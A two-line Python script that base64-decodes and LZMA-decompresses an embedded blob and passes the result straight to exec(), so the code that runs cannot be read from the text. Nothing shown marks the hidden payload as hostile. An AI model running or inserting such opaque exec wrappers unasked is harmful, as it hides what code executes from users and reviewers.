import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4ABVAFBdADIZSQQyDRF6hiPekxUzIOHMyaY7FteYcGlsJMtIp5Kv39WoFMFdCFhPL1crRt3iBqCW05stlfP0pD7AoQ8a0YjpER61YKZTlFDYukjrJJ2aAD9wNH25Q1XIAAFsVkFlxmsftvN9AQAAAAAEWVo=')))